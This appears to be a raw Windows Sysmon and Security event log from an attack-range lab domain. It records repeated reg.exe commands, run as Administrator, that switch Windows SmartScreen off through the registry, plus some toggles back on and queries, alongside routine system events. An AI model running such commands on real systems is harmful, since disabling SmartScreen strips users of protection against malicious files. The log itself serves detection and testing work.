13241300x80000000000000002584Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-01 22:45:40.827{7A09209E-1EAA-65BC-ED03-000000004703}3632C:\Windows\regedit.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SmartScreenEnabledOffAR-WIN-2\Administrator 13241300x80000000000000002583Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-01 22:45:34.024{7A09209E-1EAA-65BC-ED03-000000004703}3632C:\Windows\regedit.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SmartScreenEnabledOnAR-WIN-2\Administrator 13241300x80000000000000002582Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-01 22:45:30.134{7A09209E-1EAA-65BC-ED03-000000004703}3632C:\Windows\regedit.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SmartScreenEnabledOnnAR-WIN-2\Administrator 4688201331200x8020000000000000386151Securityar-win-2.attackrange.localAR-WIN-2\AdministratorAdministratorAR-WIN-20x18ca4b0x14d8C:\Windows\System32\reg.exe%%19360x15c8reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /fNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 154100x80000000000000002544Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-2024-02-01 22:40:55.609{7A09209E-1DF7-65BC-D403-000000004703}5336C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /fC:\Users\Administrator\AR-WIN-2\Administrator{7A09209E-1DA2-65BC-4BCA-180000000000}0x18ca4b2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{7A09209E-1DB7-65BC-BA03-000000004703}5576C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" AR-WIN-2\Administrator 4688201331200x8020000000000000386150Securityar-win-2.attackrange.localAR-WIN-2\AdministratorAdministratorAR-WIN-20x18ca4b0x17a8C:\Windows\System32\reg.exe%%19360x15c8reg add "HKLM\SOFTPLORER" /v icrosoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /fNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 154100x80000000000000002543Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-2024-02-01 22:40:39.110{7A09209E-1DE7-65BC-D303-000000004703}6056C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTPLORER" /v icrosoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /fC:\Users\Administrator\AR-WIN-2\Administrator{7A09209E-1DA2-65BC-4BCA-180000000000}0x18ca4b2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{7A09209E-1DB7-65BC-BA03-000000004703}5576C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" AR-WIN-2\Administrator 4688201331200x8020000000000000386148Securityar-win-2.attackrange.localAR-WIN-2\AdministratorAdministratorAR-WIN-20x18ca4b0x1718C:\Windows\System32\reg.exe%%19360x15c8reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /fNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 154100x80000000000000002541Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-2024-02-01 22:40:28.831{7A09209E-1DDC-65BC-D103-000000004703}5912C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /fC:\Users\Administrator\AR-WIN-2\Administrator{7A09209E-1DA2-65BC-4BCA-180000000000}0x18ca4b2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{7A09209E-1DB7-65BC-BA03-000000004703}5576C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" AR-WIN-2\Administrator 4688201331200x8020000000000000392267Securityar-win-dc.attackrange.localATTACKRANGE\AdministratorAdministratorATTACKRANGE0x4cd7d0x15c4C:\Windows\System32\reg.exe%%19360x58creg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /fNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 154100x80000000000000004578Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2024-02-01 22:38:44.217{03D06954-1D74-65BC-5F03-000000004703}5572C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /fC:\Users\Administrator\ATTACKRANGE\Administrator{03D06954-06DA-65BC-7DCD-040000000000}0x4cd7d2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{03D06954-15A7-65BC-7402-000000004703}1420C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\Administrator 4688201331200x8020000000000000392266Securityar-win-dc.attackrange.localATTACKRANGE\AdministratorAdministratorATTACKRANGE0x4cd7d0x1240C:\Windows\System32\reg.exe%%19360x58creg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /fNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 154100x80000000000000004577Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2024-02-01 22:38:38.731{03D06954-1D6E-65BC-5E03-000000004703}4672C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /fC:\Users\Administrator\ATTACKRANGE\Administrator{03D06954-06DA-65BC-7DCD-040000000000}0x4cd7d2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{03D06954-15A7-65BC-7402-000000004703}1420C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\Administrator 4688201331200x8020000000000000392062Securityar-win-dc.attackrange.localATTACKRANGE\AdministratorAdministratorATTACKRANGE0x4cd7d0xec4C:\Windows\System32\reg.exe%%19360x58creg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /fNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 154100x80000000000000004485Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2024-02-01 22:23:27.203{03D06954-19DF-65BC-0303-000000004703}3780C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /fC:\Users\Administrator\ATTACKRANGE\Administrator{03D06954-06DA-65BC-7DCD-040000000000}0x4cd7d2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{03D06954-15A7-65BC-7402-000000004703}1420C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\Administrator 4688201331200x8020000000000000392048Securityar-win-dc.attackrange.localATTACKRANGE\AdministratorAdministratorATTACKRANGE0x4cd7d0x127cC:\Windows\System32\reg.exe%%19360x58creg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "On" /fNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 154100x80000000000000004474Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2024-02-01 22:22:54.530{03D06954-19BE-65BC-F802-000000004703}4732C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "On" /fC:\Users\Administrator\ATTACKRANGE\Administrator{03D06954-06DA-65BC-7DCD-040000000000}0x4cd7d2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{03D06954-15A7-65BC-7402-000000004703}1420C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\Administrator 4688201331200x8020000000000000392047Securityar-win-dc.attackrange.localATTACKRANGE\AdministratorAdministratorATTACKRANGE0x4cd7d0xaf4C:\Windows\System32\reg.exe%%19360x58creg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /fNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 154100x80000000000000004473Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2024-02-01 22:22:34.957{03D06954-19AA-65BC-F702-000000004703}2804C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /fC:\Users\Administrator\ATTACKRANGE\Administrator{03D06954-06DA-65BC-7DCD-040000000000}0x4cd7d2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{03D06954-15A7-65BC-7402-000000004703}1420C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\Administrator 154100x80000000000000004472Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2024-02-01 22:22:01.476{03D06954-1989-65BC-F602-000000004703}2332C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /fC:\Users\Administrator\ATTACKRANGE\Administrator{03D06954-06DA-65BC-7DCD-040000000000}0x4cd7d2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{03D06954-15A7-65BC-7402-000000004703}1420C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\Administrator 4688201331200x8020000000000000392028Securityar-win-dc.attackrange.localATTACKRANGE\AdministratorAdministratorATTACKRANGE0x4cd7d0x91cC:\Windows\System32\reg.exe%%19360x58creg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /fNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 4688201331200x8020000000000000392000Securityar-win-dc.attackrange.localATTACKRANGE\AdministratorAdministratorATTACKRANGE0x4cd7d0x1194C:\Windows\System32\reg.exe%%19360x58creg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabledNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 154100x80000000000000004456Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2024-02-01 22:19:43.504{03D06954-18FF-65BC-E602-000000004703}4500C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabledC:\Users\Administrator\ATTACKRANGE\Administrator{03D06954-06DA-65BC-7DCD-040000000000}0x4cd7d2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{03D06954-15A7-65BC-7402-000000004703}1420C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\Administrator 4688201331200x8020000000000000391999Securityar-win-dc.attackrange.localATTACKRANGE\AdministratorAdministratorATTACKRANGE0x4cd7d0xb28C:\Windows\System32\reg.exe%%19360x58creg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "On" /fNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 154100x80000000000000004455Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2024-02-01 22:19:15.867{03D06954-18E3-65BC-E502-000000004703}2856C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "On" /fC:\Users\Administrator\ATTACKRANGE\Administrator{03D06954-06DA-65BC-7DCD-040000000000}0x4cd7d2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{03D06954-15A7-65BC-7402-000000004703}1420C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\Administrator 154100x80000000000000004410Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2024-02-01 22:12:38.226{03D06954-1756-65BC-B702-000000004703}4880C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabledC:\Users\Administrator\ATTACKRANGE\Administrator{03D06954-06DA-65BC-7DCD-040000000000}0x4cd7d2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{03D06954-15A7-65BC-7402-000000004703}1420C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\Administrator 4688201331200x8020000000000000391908Securityar-win-dc.attackrange.localATTACKRANGE\AdministratorAdministratorATTACKRANGE0x4cd7d0x1310C:\Windows\System32\reg.exe%%19360x58creg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabledNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 154100x80000000000000004372Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2024-02-01 22:06:51.463{03D06954-15FB-65BC-9002-000000004703}6080C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /fC:\Users\Administrator\ATTACKRANGE\Administrator{03D06954-06DA-65BC-7DCD-040000000000}0x4cd7d2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{03D06954-15A7-65BC-7402-000000004703}1420C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\Administrator 4688201331200x8020000000000000391812Securityar-win-dc.attackrange.localATTACKRANGE\AdministratorAdministratorATTACKRANGE0x4cd7d0x17c0C:\Windows\System32\reg.exe%%19360x58creg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /fNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 154100x80000000000000004371Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2024-02-01 22:06:41.024{03D06954-15F1-65BC-8F02-000000004703}5972C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /fC:\Users\Administrator\ATTACKRANGE\Administrator{03D06954-06DA-65BC-7DCD-040000000000}0x4cd7d2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{03D06954-15A7-65BC-7402-000000004703}1420C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\Administrator 4688201331200x8020000000000000391811Securityar-win-dc.attackrange.localATTACKRANGE\AdministratorAdministratorATTACKRANGE0x4cd7d0x1754C:\Windows\System32\reg.exe%%19360x58creg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /fNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 13241300x800000000000000070914Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-09 20:03:29.026{03D06954-802A-65C6-0A00-000000004803}592C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000070750Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-09 19:47:05.733{03D06954-811F-65C6-8200-000000004803}1964\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshedDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000070749Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-09 19:47:05.733{03D06954-811F-65C6-8200-000000004803}1964\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x800000000000000067498Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-09 19:46:56.442{7A09209E-811A-65C6-8100-000000004803}2420\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshedDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000067497Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-09 19:46:56.442{7A09209E-811A-65C6-8100-000000004803}2420\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshDWORD (0x00000000)NT AUTHORITY\SYSTEM 100304000x8000000000000023484Applicationar-win-dc.attackrange.local55c92734-d682-4d71-983e-d6ec3f16059f 1: 21c56779-b449-4d20-adfc-eece0e1ad74b, 1, 1 [(0 [0x00000000, 1, 0], [(?)( 1 0x00000000)(?)( 2 0x00000000 0 0 msft:rm/algorithm/volume/1.0 0x4004F040 257800)(?)(?)( 10 0x00000000 msft:rm/algorithm/flags/1.0)(?)])(1 )(2 )(3 )] 2: 22105925-48c3-4ff4-a294-f654bb27e390, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 3: 2e7a9ad1-a849-4b56-babe-17d5a29fe4b4, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 4: 3c006fa7-3b03-45a4-93da-63ddc1bdce11, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 5: 3c2da9a5-1c6e-45d1-855f-fdbef536676f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 6: 562634bb-b8d8-43eb-8325-bf63a42c4174, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 7: 58448dfb-6ac0-4e06-b491-07f2b657b268, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 8: 661f7658-7035-4b4c-9f35-010682943ec2, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 9: 942efa8f-516f-46d8-8541-b1ee1bce08c6, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 10: 9db83b52-9904-4326-8957-ebe6feedf37c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 11: a43f7b89-8023-413a-9f58-b8aec2c04d00, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 12: cbf3499f-848e-488b-a165-ac6d7e27439d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 13: d6992aac-29e7-452a-bf10-bbfb8ccabe59, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 14: d839f159-1128-480b-94b6-77fa9943a16a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 15: e73aabfa-12bc-4705-b551-2dd076bebc7d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 16: fea51083-1906-44ed-9072-86af9be7ab9a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 106604000x8000000000000023483Applicationar-win-dc.attackrange.localC:\Windows\system32\sppwinob.dll, msft:spp/windowsfunctionality/agent/7.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/inherited/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/phone/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/pkey/detect, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/ActionScheduler/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/TaskScheduler/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/statecollector/pkey, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/volume/services/kms/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/volume/services/kms/activationinfo/1.0, 0x00000000, 0x00000000 100304000x8000000000000023450Applicationar-win-2.attackrange.local55c92734-d682-4d71-983e-d6ec3f16059f 1: 21c56779-b449-4d20-adfc-eece0e1ad74b, 1, 1 [(0 [0x00000000, 1, 0], [(?)( 1 0x00000000)(?)( 2 0x00000000 0 0 msft:rm/algorithm/volume/1.0 0x4004F040 257800)(?)(?)( 10 0x00000000 msft:rm/algorithm/flags/1.0)(?)])(1 )(2 )(3 )] 2: 22105925-48c3-4ff4-a294-f654bb27e390, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 3: 2e7a9ad1-a849-4b56-babe-17d5a29fe4b4, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 4: 3c006fa7-3b03-45a4-93da-63ddc1bdce11, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 5: 3c2da9a5-1c6e-45d1-855f-fdbef536676f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 6: 562634bb-b8d8-43eb-8325-bf63a42c4174, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 7: 58448dfb-6ac0-4e06-b491-07f2b657b268, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 8: 661f7658-7035-4b4c-9f35-010682943ec2, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 9: 942efa8f-516f-46d8-8541-b1ee1bce08c6, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 10: 9db83b52-9904-4326-8957-ebe6feedf37c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 11: a43f7b89-8023-413a-9f58-b8aec2c04d00, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 12: cbf3499f-848e-488b-a165-ac6d7e27439d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 13: d6992aac-29e7-452a-bf10-bbfb8ccabe59, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 14: d839f159-1128-480b-94b6-77fa9943a16a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 15: e73aabfa-12bc-4705-b551-2dd076bebc7d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 16: fea51083-1906-44ed-9072-86af9be7ab9a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 106604000x8000000000000023449Applicationar-win-2.attackrange.localC:\Windows\system32\sppwinob.dll, msft:spp/windowsfunctionality/agent/7.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/inherited/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/phone/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/pkey/detect, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/ActionScheduler/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/TaskScheduler/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/statecollector/pkey, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/volume/services/kms/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/volume/services/kms/activationinfo/1.0, 0x00000000, 0x00000000 